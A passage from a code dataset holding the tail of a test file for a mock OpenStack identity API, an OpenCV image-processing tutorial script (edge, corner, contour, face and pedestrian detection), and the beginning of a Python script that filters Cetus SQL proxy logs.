\"OS-KSCATALOG:endpointTemplate\": {\n \"id\": \"some-id\"\n }\n }\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n body=data,\n headers=self.headers))\n\n self.assertEqual(response.code, 404)\n self.assertEqual(json_body['itemNotFound']['code'], 404)\n self.assertTrue(\n json_body['itemNotFound']['message'].startswith(\n \"Unable to locate an External API with the given Template ID.\"\n )\n )\n\n def test_enable_template(self):\n \"\"\"\n POST can update an existing endpoint template resulting in a 201.\n \"\"\"\n self.core.add_api(self.eeapi)\n id_key = get_template_id(self, self.eeapi)\n data = {\n \"OS-KSCATALOG:endpointTemplate\": {\n \"id\": id_key\n }\n }\n\n req = request(self, self.root, self.verb,\n self.uri,\n body=json.dumps(data).encode(\"utf-8\"),\n headers=self.headers)\n\n response = self.successResultOf(req)\n self.assertEqual(response.code, 201)\n\n\nclass TestIdentityOSKSCatalogTenantAdminEndpointTemplatesDelete(SynchronousTestCase, IdentityAuthMixin):\n \"\"\"\n Tests for ``/identity/v2.0//OS-KSCATALOG/endpointTemplates``,\n provided by :obj:`mimic.rest.idenity_api.IdentityApi`\n \"\"\"\n def setUp(self):\n self.tenant_id = 'some_tenant'\n self.core = MimicCore(Clock(), [])\n self.root = MimicRoot(self.core).app.resource()\n self.eeapi_name = u\"externalServiceName\"\n self.eeapi = make_example_external_api(\n self,\n name=self.eeapi_name\n )\n self.template_id = get_template_id(self, self.eeapi)\n self.assertIsNotNone(self.template_id)\n self.uri = (\n \"/identity/v2.0/tenants/\" + self.tenant_id +\n \"/OS-KSCATALOG/endpoints/\" + self.template_id\n )\n self.headers = {\n b'X-Auth-Token': [b'ABCDEF987654321']\n }\n self.verb = b\"DELETE\"\n\n def test_invalid_template_id(self):\n \"\"\"\n DELETE with an invalid endpoint template id results in 404.\n \"\"\"\n self.eeapi.remove_template(self.template_id)\n self.core.add_api(self.eeapi)\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 404)\n 
self.assertEqual(json_body['itemNotFound']['code'], 404)\n self.assertTrue(\n json_body['itemNotFound']['message'].startswith(\n \"Unable to locate an External API with the given Template ID.\"\n )\n )\n\n def test_template_id_not_enabled_for_tenant(self):\n \"\"\"\n DELETE for endpoint template not enabled for a tenant or globally\n results in 404.\n \"\"\"\n self.core.add_api(self.eeapi)\n (response, json_body) = self.successResultOf(\n json_request(self, self.root, self.verb,\n self.uri,\n headers=self.headers))\n\n self.assertEqual(response.code, 404)\n self.assertEqual(json_body['itemNotFound']['code'], 404)\n self.assertEqual(\n json_body['itemNotFound']['message'],\n \"Template not enabled for tenant\"\n )\n\n def test_disable_template(self):\n \"\"\"\n DELETE for endpoint template enabled for tenant results in 204.\n \"\"\"\n self.core.add_api(self.eeapi)\n self.eeapi.enable_endpoint_for_tenant(\n self.tenant_id,\n self.template_id\n )\n eeapi2 = make_example_external_api(\n self,\n name=\"alternate \" + self.eeapi_name\n )\n ept_id2 = get_template_id(self, eeapi2)\n eeapi2.remove_template(ept_id2)\n self.core.add_api(eeapi2)\n req = request(self, self.root, self.verb,\n self.uri,\n headers=self.headers)\n\n response = self.successResultOf(req)\n self.assertEqual(response.code, 204)\n","repo_name":"rackerlabs/mimic","sub_path":"mimic/test/test_identity_oskscatalog_per_tenant.py","file_name":"test_identity_oskscatalog_per_tenant.py","file_ext":"py","file_size_in_byte":11971,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"37"} +{"seq_id":"30939778420","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 9 15:45:29 2023\r\n\r\n@author: hasan\r\n\"\"\"\r\n#%% Edge Detection\r\n\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimg = cv2.imread(\"london.jpg\", 0)\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#Without doing anything\r\nedges = cv2.Canny(image = img, threshold1 = 0, threshold2 = 255)\r\nplt.figure(), plt.imshow(edges, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#With thresholds\r\nmedImg = np.median(img)\r\nprint(medImg)\r\n\r\nlow = int(max(0, (1 - 0.33) * medImg))\r\nhigh = int(min(255, (1 + 0.33) * medImg))\r\n\r\nprint(low, high)\r\n\r\nedges = cv2.Canny(image = img, threshold1 = low, threshold2 = high)\r\nplt.figure(), plt.imshow(edges, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#With blurring + thresolds\r\n\r\nblurredImg = cv2.blur(img, ksize= (5,5))\r\nplt.figure(), plt.imshow(blurredImg, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\nmedBlurredImg = np.median(blurredImg)\r\n\r\nlow = int(max(0, (1 - 0.33) * medBlurredImg))\r\nhigh = int(min(255, (1 + 0.33) * medBlurredImg))\r\n\r\nedges2 = cv2.Canny(image = blurredImg, threshold1 = low, threshold2 = high)\r\nplt.figure(), plt.imshow(edges2, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#%% Corner Detection\r\n\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimg = cv2.imread(\"sudoku.jpg\", 0)\r\nimg = np.float32(img)\r\nprint(img.shape)\r\n\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# harris corner detection\r\ndst = cv2.cornerHarris(img, blockSize = 2, ksize = 3, k = 0.04)\r\ndst = cv2.dilate(dst,None)\r\nimg[dst > 0.2 * dst.max()] = 255\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#shi tomasi detection\r\n\r\nimg = cv2.imread(\"sudoku.jpg\", 0)\r\nimg = np.float32(img)\r\n\r\ncorners = cv2.goodFeaturesToTrack(img, 120, 
0.01,10)\r\ncorners = np.int64(corners)\r\n\r\nfor i in corners:\r\n    x,y = i.ravel()\r\n    cv2.circle(img, (x,y), 3, (125,125,125), cv2.FILLED)\r\n\r\nplt.imshow(img), plt.axis(\"off\")\r\n\r\n#%% contour detection\r\n\r\nimg = cv2.imread(\"contour.jpg\", 0)\r\nplt.figure(), plt.imshow(img, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\ncontours, hierarch = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\nexternal_contour = np.zeros(img.shape)\r\ninternal_contour = np.zeros(img.shape)\r\n\r\nfor i in range(len(contours)):\r\n    \r\n    #external \r\n    if hierarch[0][i][3] == -1:\r\n        cv2.drawContours(external_contour, contours, i, 255, -1)\r\n    else:\r\n        cv2.drawContours(internal_contour, contours, i, 255, -1)\r\n\r\n\r\nplt.figure(), plt.imshow(external_contour, cmap=\"gray\"), plt.axis(\"off\")\r\nplt.figure(), plt.imshow(internal_contour, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n\r\n#Object detection with color\r\n\r\nimport cv2 \r\nimport numpy as np\r\nfrom collections import deque\r\n\r\nbuffer_size = 16\r\npts = deque(maxlen = buffer_size)\r\n\r\n#HSV blue\r\n\r\nblueLower = (84,98,0)\r\nblueUpper = (179,255,255)\r\n\r\n#capture\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3,960)\r\ncap.set(4,480)\r\n\r\nwhile True:\r\n    \r\n    success, imgOriginal = cap.read()\r\n    \r\n    if success:\r\n        \r\n        #blur\r\n        blurred = cv2.GaussianBlur(imgOriginal, (11,11), 0)\r\n        \r\n        # hsv\r\n        hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\r\n        cv2.imshow(\"HSV Image\", hsv)\r\n        \r\n        #mask for blue\r\n        mask = cv2.inRange(hsv,blueLower,blueUpper)\r\n        mask = cv2.erode(mask,None, iterations = 2)\r\n        mask = cv2.dilate(mask,None, iterations = 2)\r\n        cv2.imshow(\"Mask + erosion and dilate\", mask)\r\n        \r\n        #contours\r\n        contours,_ = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n        center = None\r\n        \r\n        if len(contours) > 0:\r\n            \r\n            #get the max contour\r\n            c = max(contours, key = cv2.contourArea)\r\n            #rectangle\r\n            rect = cv2.minAreaRect(c)\r\n            ((x,y), (width,height), rotation) = rect \r\n            \r\n            #box\r\n            box = cv2.boxPoints(rect)\r\n            box = np.int64(box)\r\n            \r\n            #moment\r\n            M = cv2.moments(c)\r\n            center = (int(M[\"m10\"] / M[\"m00\"]),int(M[\"m01\"] / M[\"m00\"]))\r\n            \r\n            #draw \r\n            cv2.drawContours(imgOriginal, [box], 0, (0,255,255), 2)\r\n            cv2.circle(imgOriginal, center, 5, (255,0,255), -1)\r\n            \r\n        pts.appendleft(center)\r\n        \r\n        for i in range(1, len(pts)):\r\n            \r\n            if pts[i - 1] is None or pts[i] is None: continue\r\n            cv2.line(imgOriginal, pts[i-1], pts[i], (0,255,0), 3)\r\n        \r\n        \r\n        cv2.imshow(\"Original\", imgOriginal)\r\n        if cv2.waitKey(1) & 0XFF == ord(\"q\") : break\r\n    \r\ncap.release()\r\ncv2.destroyAllWindows()\r\n    \r\n#%% Template Matching\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nimg = cv2.imread(\"cat.jpg\",0)\r\nprint(img.shape)\r\n\r\ntemplate = cv2.imread(\"cat_face.jpg\", 0)\r\nprint(template.shape)\r\nh,w = template.shape\r\n\r\nmethods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR',\r\n           'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\r\n\r\nfor met in methods:\r\n    \r\n    method = eval(met)\r\n    res = cv2.matchTemplate(img,template,method)\r\n    print(res.shape)\r\n    \r\n    min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\r\n    \r\n    if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\r\n        top_left = min_loc\r\n    else:\r\n        top_left = max_loc\r\n    \r\n    bottom_right = (top_left[0] + w, top_left[1] + h)\r\n    cv2.rectangle(img, top_left, bottom_right, 255, 2)\r\n    \r\n    plt.figure()\r\n    plt.subplot(121), 
plt.imshow(res,cmap=\"gray\")\r\n plt.title(\"Matched Image\"), plt.axis(\"off\")\r\n plt.subplot(122), plt.imshow(img,cmap=\"gray\")\r\n plt.title(\"Detected Result\"), plt.axis(\"off\")\r\n plt.suptitle(met)\r\n plt.show()\r\n\r\n#%% Feature Matching\r\n\r\nchocos = cv2.imread(\"chocolates.jpg\",0)\r\nplt.figure(), plt.imshow(chocos, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\nwhiteChoco = cv2.imread(\"nestle.jpg\", 0)\r\nplt.figure(), plt.imshow(whiteChoco, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#Brute Force (doesn't work well and its slow)\r\norb = cv2.ORB_create()\r\n\r\nkp1, des1 = orb.detectAndCompute(whiteChoco, None)\r\nkp2, des2 = orb.detectAndCompute(chocos, None)\r\n\r\nbf = cv2.BFMatcher(cv2.NORM_HAMMING)\r\n\r\nmatches = bf.match(des1,des2)\r\n\r\nmatches = sorted(matches, key = lambda x: x.distance)\r\n\r\nplt.figure()\r\nimg_match = cv2.drawMatches(whiteChoco, kp1, chocos, kp2, matches[:20], None, flags = 2)\r\nplt.imshow(img_match), plt.axis(\"off\")\r\n\r\n\r\n#sift\r\n\r\nsift = cv2.SIFT_create()\r\n\r\n#bf \r\n\r\nbf = cv2.BFMatcher()\r\n\r\n# key point detector with sift\r\n\r\nkp1, des1 = sift.detectAndCompute(whiteChoco, None)\r\nkp2, des2 = sift.detectAndCompute(chocos, None)\r\n\r\nmatches = bf.knnMatch(des1,des2, k = 2)\r\n\r\nbetterMatches = []\r\n\r\nfor match1, match2 in matches:\r\n \r\n if match1.distance < 0.75*match2.distance:\r\n betterMatches.append([match1])\r\n\r\nplt.figure()\r\nsift_matches = cv2.drawMatchesKnn(whiteChoco, kp1, chocos, kp2, betterMatches, None, flags = 2)\r\nplt.imshow(sift_matches), plt.axis(\"off\")\r\n\r\n#%% Watershed algorithm\r\n\r\nimport cv2 \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\ncoins = cv2.imread(\"coins.jpg\")\r\nplt.figure(), plt.imshow(coins), plt.axis(\"off\")\r\n\r\n#blurring\r\nblurredCoin = cv2.medianBlur(coins,13)\r\nplt.figure(), plt.imshow(blurredCoin), plt.axis(\"off\")\r\n\r\n#grayscale\r\n\r\ngrayCoin = cv2.cvtColor(blurredCoin, cv2.COLOR_BGR2GRAY)\r\nplt.figure(), plt.imshow(grayCoin, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#binary threshold \r\n\r\nret, coin_thresh = cv2.threshold(grayCoin, 75,255, cv2.THRESH_BINARY)\r\nplt.figure(), plt.imshow(coin_thresh, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# contour \r\n\r\ncontours, hier = cv2.findContours(coin_thresh.copy(), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\nfor i in range(len(contours)):\r\n\r\n if hier[0][i][3] == -1:\r\n cv2.drawContours(coins,contours,i,(0,255,0),10)\r\n\r\n\r\nplt.figure(), plt.imshow(coins, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#the upper method didn't work well thought all the coins as one entity\r\n\r\ncoins = cv2.imread(\"coins.jpg\")\r\nplt.figure(), plt.imshow(coins), plt.axis(\"off\")\r\n\r\n# lpf: blurring\r\ncoin_blur = cv2.medianBlur(coins, 13)\r\nplt.figure(), plt.imshow(coin_blur), plt.axis(\"off\")\r\n\r\n# grayscale\r\ncoin_gray = cv2.cvtColor(coin_blur, cv2.COLOR_BGR2GRAY)\r\nplt.figure(), plt.imshow(coin_gray, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# binary threshold\r\nret, coin_thresh = cv2.threshold(coin_gray, 65, 255, cv2.THRESH_BINARY)\r\nplt.figure(), plt.imshow(coin_thresh, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# opening\r\n\r\nkernel = np.ones((3,3), np.uint8)\r\nopening = cv2.morphologyEx(coin_thresh, cv2.MORPH_OPEN, kernel, iterations = 2)\r\nplt.figure(), plt.imshow(opening, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#distances between images \r\n\r\ndist_transform = cv2.distanceTransform(opening, cv2.DIST_L2, 5)\r\nplt.figure(), plt.imshow(dist_transform, 
cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#minimize image\r\n\r\nret, sure_foreground = cv2.threshold(dist_transform, 0.4*np.max(dist_transform), 255,0)\r\nplt.figure(), plt.imshow(sure_foreground, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#enlarge the image for the background\r\n\r\nsure_background = cv2.dilate(opening, kernel, iterations = 1)\r\nsure_foreground = np.uint8(sure_foreground)\r\nunknown = cv2.subtract(sure_background, sure_foreground )\r\nplt.figure(), plt.imshow(unknown, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#connection\r\n\r\nret, marker = cv2.connectedComponents(sure_foreground)\r\nplt.figure(), plt.imshow(marker, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\nmarker = marker + 1\r\nmarker[unknown == 255] = 0\r\nplt.figure(), plt.imshow(marker, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n#watershed\r\nmarker = cv2.watershed(coins,marker)\r\nplt.figure(), plt.imshow(marker, cmap=\"gray\"), plt.axis(\"off\")\r\n\r\n# contour \r\n\r\ncontours, hier = cv2.findContours(marker.copy(), cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\nfor i in range(len(contours)):\r\n\r\n if hier[0][i][3] == -1:\r\n cv2.drawContours(coins,contours,i,(255,0,0),10)\r\n\r\n\r\nplt.figure(), plt.imshow(coins), plt.axis(\"off\")\r\n\r\n\r\n#%% face recognition\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\neinstein = cv2.imread(\"einstein.jpg\", 0)\r\nplt.figure(), plt.imshow(einstein, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#classifier\r\nface_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\nface_rect = face_cascade.detectMultiScale(einstein)\r\n\r\nfor (x,y,w,h) in face_rect:\r\n cv2.rectangle(einstein, (x,y),(x+w, y+h),(255,255,255),10)\r\nplt.figure(), plt.imshow(einstein, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n#barce\r\n\r\nbarce = cv2.imread(\"barcelona.jpg\", 0)\r\nplt.figure(), plt.imshow(barce, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\nface_rect = face_cascade.detectMultiScale(barce, minNeighbors= 7)\r\nfor (x,y,w,h) in face_rect:\r\n cv2.rectangle(barce, (x,y),(x+w, y+h),(255,255,255),10)\r\nplt.figure(), plt.imshow(barce, cmap = \"gray\"), plt.axis(\"off\")\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n \r\n ret, frame = cap.read()\r\n \r\n if ret:\r\n \r\n face_rect = face_cascade.detectMultiScale(frame, minNeighbors = 7)\r\n \r\n for (x,y,w,h) in face_rect:\r\n cv2.rectangle(frame, (x,y),(x+w, y+h),(255,255,255),10)\r\n cv2.imshow(\"face detect\", frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"): break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n#%% cat face recognition\r\n\r\nimport cv2\r\nimport os \r\n\r\nfiles = os.listdir()\r\nprint(files)\r\n\r\nimg_list = []\r\nmin_size = (70,70) \r\nmax_size = (200, 200)\r\n\r\nfor f in files :\r\n if f.startswith(\"cat_img\"): \r\n img_list.append(f)\r\nprint(img_list)\r\n\r\nfor j in img_list:\r\n print(j)\r\n image = cv2.imread(j)\r\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n detector = cv2.CascadeClassifier(\"haarcascade_frontalcatface.xml\")\r\n rects = detector.detectMultiScale(gray, scaleFactor = 1.030, minNeighbors = 2, minSize = min_size, maxSize = max_size)\r\n \r\n for(i,(x,y,w,h)) in enumerate(rects): \r\n \r\n cv2.rectangle(image, (x,y),(x+w, y+h),(0,255,255),2)\r\n cv2.putText(image, \"Kedi {}\".format(i+1), (x,y-10), cv2.FONT_HERSHEY_COMPLEX, 0.55, (0,255,255), 2)\r\n \r\n \r\n cv2.imshow(j, image)\r\n if cv2.waitKey(0) & 0xFF == ord(\"q\"): continue\r\n\r\ncv2.destroyAllWindows()\r\n\r\n#%% custom cascade\r\n\r\nimport 
cv2\r\nimport os\r\n\r\npath = \"images\"\r\n\r\nimgWidth = 180\r\nimgHeight = 120\r\n\r\n# video capture\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, 640)\r\ncap.set(4, 480)\r\ncap.set(10, 180)\r\n\r\nglobal countFolder\r\ndef saveDataFunc():\r\n global countFolder\r\n countFolder = 0\r\n while os.path.exists(path + str(countFolder)):\r\n countFolder += 1\r\n os.makedirs(path+str(countFolder))\r\n\r\nsaveDataFunc()\r\n\r\ncount = 0\r\ncountSave = 0\r\n\r\nwhile True:\r\n \r\n success, img = cap.read()\r\n \r\n if success:\r\n \r\n img = cv2.resize(img, (imgWidth, imgHeight))\r\n \r\n if count % 5 == 0:\r\n cv2.imwrite(path+str(countFolder)+\"/\"+str(countSave)+\"_\"+\".png\",img)\r\n countSave += 1\r\n print(countSave)\r\n count += 1\r\n \r\n cv2.imshow(\"Image\",img)\r\n if cv2.waitKey(1) & 0xFF == ord(\"q\"): break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n#%% Pedestrian detection\r\n\r\nfiles = os.listdir()\r\nimg_list = []\r\n\r\nfor f in files :\r\n if f.startswith(\"img\"):\r\n img_list.append(f)\r\n \r\nprint(img_list)\r\n\r\n# hog \r\nhog = cv2.HOGDescriptor()\r\n#svm \r\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\r\n\r\nfor imagePath in img_list:\r\n image = cv2.imread(imagePath)\r\n \r\n (rects, weights) = hog.detectMultiScale(image, padding = (10,10), scale = 1.05)\r\n \r\n for (x,y,w,h) in rects:\r\n cv2.rectangle(image, (x,y), (x+w, y+h), (0,0,255), 2)\r\n \r\n cv2.imshow(\"Pedestrian: \", image)\r\n \r\n if cv2.waitKey(0) & 0xFF == ord(\"q\"): continue\r\n\r\n\r\ncv2.destroyAllWindows()\r\n\r\n#%% HA\r\n\r\n# let's import the opencv library\r\n# ...\r\nimport cv2\r\n# let's import the numpy library\r\n# ...\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n# let's load the image in grayscale and plot it\r\n# ...\r\nimage = cv2.imread(\"odev2.jpg\", 0)\r\ncv2.imshow(\"Original\", image)\r\n# let's detect the edges in the image and visualize them (edge detection)\r\n# ...\r\n\r\nmedImg = np.median(image)\r\nprint(medImg)\r\n\r\nlow = int(max(0, (1 - 0.33) * medImg))\r\nhigh = int(min(255, (1 + 0.33) * medImg))\r\nedges = cv2.Canny(image = image, threshold1 = low, threshold2 = high)\r\ncv2.imshow(\"Edges\", edges)\r\n\r\n# let's import the haar cascade needed for face detection\r\n# ...\r\ndetector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n# let's run face detection and visualize the results\r\n# ...\r\nmin_size = (20,20) \r\nmax_size = (120,120)\r\nrects = detector.detectMultiScale(image, minNeighbors= 4, minSize = min_size, maxSize = max_size)\r\nfor (x,y,w,h) in rects:\r\n cv2.rectangle(image, (x,y), (x+w, y+h), (255,255,255), 5)\r\n \r\ncv2.imshow(\"Rectangles \", image)\r\nplt.figure(), plt.imshow(image, cmap=\"gray\"), plt.axis(\"off\")\r\n# let's initialize HOG, call our person-detection algorithm and set the SVM\r\n# ...\r\nimage2 = image.copy()\r\nhog = cv2.HOGDescriptor() \r\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\r\n\r\n# let's apply our person-detection algorithm to the image and visualize it\r\n# ...\r\n\r\n(rects, weights) = hog.detectMultiScale(image, padding = (10,10), scale = 1.10)\r\n \r\nfor (x,y,w,h) in rects:\r\n cv2.rectangle(image2, (x,y), (x+w, y+h), (0,0,255), 2)\r\n \r\ncv2.imshow(\"HOG: \", 
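# --- Editor's aside (illustrative): hog.detectMultiScale, used in the pedestrian
# detection above, typically returns several overlapping boxes per person. A
# plain-NumPy non-maximum suppression pass, sketched below, keeps only the strongest
# box of each overlapping cluster; 0.65 is an arbitrary overlap threshold. Boxes are
# converted from (x, y, w, h) to corner form first.
import numpy as np

def non_max_suppression(boxes, overlap_thresh=0.65):
    # boxes: array of (x1, y1, x2, y2) rows
    if len(boxes) == 0:
        return boxes
    boxes = boxes.astype("float")
    x1, y1, x2, y2 = boxes[:, 0], boxes[:, 1], boxes[:, 2], boxes[:, 3]
    area = (x2 - x1 + 1) * (y2 - y1 + 1)
    order = np.argsort(y2)
    keep = []
    while len(order) > 0:
        i = order[-1]                         # box with the largest y2 still in play
        keep.append(i)
        xx1 = np.maximum(x1[i], x1[order[:-1]])
        yy1 = np.maximum(y1[i], y1[order[:-1]])
        xx2 = np.minimum(x2[i], x2[order[:-1]])
        yy2 = np.minimum(y2[i], y2[order[:-1]])
        w = np.maximum(0, xx2 - xx1 + 1)
        h = np.maximum(0, yy2 - yy1 + 1)
        overlap = (w * h) / area[order[:-1]]
        order = order[:-1][overlap <= overlap_thresh]
    return boxes[keep].astype("int")

# hypothetical usage with the rects returned by detectMultiScale above:
# corner_boxes = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
# picked = non_max_suppression(corner_boxes)
# --- end of aside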
image2)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"candizd/ImageProcessing","sub_path":"Object_Detection/objectDetection.py","file_name":"objectDetection.py","file_ext":"py","file_size_in_byte":15477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36114219379","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport getopt\nimport json\nimport os\nimport re\nimport time\n\n\"\"\"\nFunction:\n    Filter the full Cetus log according to the given filter conditions\nInput:\n    Path to the full Cetus log\n    Start time of the query\n    End time of the query\n    Filter conditions for the full log, in JSON format\n    Name of the output file, defaults to sqllog.sql\nOutput:\n    Write the filtered log to the specified file, defaults to sqllog.sql\n\"\"\"\n\ndef usage():\n    print('Usage:\\n'\n          '  -h or --help:   show this help message\\n'\n          '  -p or --path:   log file path\\n'\n          '  -s or --start:  start time\\n'\n          '  -e or --end:    end time\\n'\n          '  -c or --cond:   filter conditions, in JSON format\\n'\n          '  -o or --output: output file name, defaults to sqllog.sql\\n'\n          )\n\ndef filter_file(path, name, start_t):\n    pathname = r'%s/%s'%(path, name)\n    file_mt = os.stat(pathname).st_mtime\n    if start_t == 0:\n        return True\n    if file_mt < start_t:\n        return False\n    return True\n\ndef filter_metadata(s):\n    try:\n        flag = re.search(r\"(#.*#)\", s).group(0)\n    except AttributeError:\n        flag = \"\"\n    if flag.strip() == \"\":\n        return False\n    return True\n\ndef filter_str(s, d):\n    for (k, v) in d.items():\n        if k == \"sql\" or k == \"latency_start\" or k == \"latency_end\":\n            continue\n        cond = r\"%s:%s\"%(str(k), str(v))\n        if s.find(cond) < 0:\n            return False\n    return True\n\ndef filter_time(s, start_t, end_t):\n    try:\n        cur = re.search(r\"(\\d{4}-\\d{1,2}-\\d{1,2}\\s\\d{1,2}:\\d{1,2}:\\d{1,2})\", s).group(0)\n    except AttributeError:\n        cur = \"\"\n    if cur.strip() == \"\":\n        cur_t = 0\n    else:\n        cur_t = time.mktime(time.strptime(cur, '%Y-%m-%d %H:%M:%S'))\n    if start_t == 0 and end_t != 0:\n        if cur_t <= end_t:\n            return True\n    elif start_t != 0 and end_t == 0:\n        if cur_t >= start_t:\n            return True\n    elif start_t !=0 and end_t != 0:\n        if cur_t >= start_t and cur_t <= end_t:\n            return True\n    else:\n        return True\n    return False\n\ndef filter_sql(s, f):\n    if f.strip() == \"\":\n        return True\n    if s.upper().find(f.upper()) < 0:\n        return False\n    return True\n\ndef filter_latency(s, st, ed):\n    if st == -1 or ed == -1:\n        return True\n    try:\n        latency = re.search(r\"latency:([0-9]+.[0-9]+)\", s).group(0)\n    except AttributeError:\n        return False\n    latency = latency.split(\":\")[1]\n    if latency.strip() == \"\":\n        return False\n    if st <= float(latency) and ed >= float(latency):\n        return True\n    return False\n\nlog_path=\"\"\nlog_cond_json=\"\"\nlog_output=\"sqllog.sql\"\nlog_time_start=\"\"\nlog_time_end=\"\"\n\nlog_sql=\"\"\nlog_latency_st=-1\nlog_latency_ed=-1\n\ntry:\n    options, args = getopt.getopt(sys.argv[1:], \"hp:c:o:s:e:\", [\"help\", \"path\", \"cond\", \"output\", \"start\", \"end\"])\nexcept getopt.GetoptError:\n    sys.exit()\nfor name, value in options:\n    if name in (\"-h\", \"--help\"):\n        usage()\n    if name in (\"-p\", \"--path\"):\n        log_path = value\n    if name in (\"-c\", \"--cond\"):\n        log_cond_json = value\n    if name in (\"-o\", \"--output\"):\n        log_output = value\n    if name in (\"-s\", \"--start\"):\n        log_time_start = value\n    if name in (\"-e\", \"--end\"):\n        log_time_end = value\n\n# process the input arguments\nif log_path.strip() == \"\":\n    print(\"Error: path is NULL\")\n    sys.exit()\n\nif log_time_start.strip() == \"\":\n    start_t = 0\nelse:\n    start_t = time.mktime(time.strptime(log_time_start, '%Y-%m-%d %H:%M:%S'))\nif log_time_end.strip() == \"\":\n    
end_t = 0\nelse:\n    end_t = time.mktime(time.strptime(log_time_end, '%Y-%m-%d %H:%M:%S'))\n\n# search the path for log files to analyze\npath_file_list = os.listdir(log_path)\npath_file_list = sorted(path_file_list, key=lambda k: os.path.getmtime(os.path.join(log_path, k)))\nlog_file_list=[]\nfor f in path_file_list:\n    # filter by the specific file extension\n    if f.endswith(\".clg\"):\n        # filter by the file's modification time\n        if filter_file(log_path, f, start_t):\n            log_file_list.append(f)\n    else:\n        # since the files are sorted by modification time, once one file fails the check, the rest must fail too\n        break\n\n# get the filter conditions and apply them\nlog_cond_json = log_cond_json.replace(\"'\", '\"')\nlog_cond_dict = json.loads(log_cond_json)\n\nfor (k, v) in log_cond_dict.items():\n    if k == \"sql\":\n        log_sql = v\n        log_sql = re.sub(r' +', ' ', log_sql)\n    if k == \"latency_start\":\n        log_latency_st = float(v)\n    if k == \"latency_end\":\n        log_latency_ed = float(v)\n\nlog_output_file = r\"%s/%s\"%(log_path, log_output)\nwfp = open(log_output_file, \"w+\")\nfor f in log_file_list:\n    st_md_start = 0\n    st_sl_start = 0\n    rfp = open(f, \"r\")\n    line_buffer = \"\"\n    for line in rfp:\n        line = line.strip()\n        # handle metadata lines\n        if filter_metadata(line):\n            st_sl_start = 0\n            if not line_buffer.strip() == \"\":\n                line_buffer = re.sub(r' +', ' ', line_buffer)\n                if filter_sql(line_buffer, log_sql):\n                    wfp.write(line_buffer + \"\\n\")\n                line_buffer = \"\"\n            # filter by the conditions\n            if filter_str(line, log_cond_dict) and filter_time(line, start_t, end_t) and filter_latency(line, 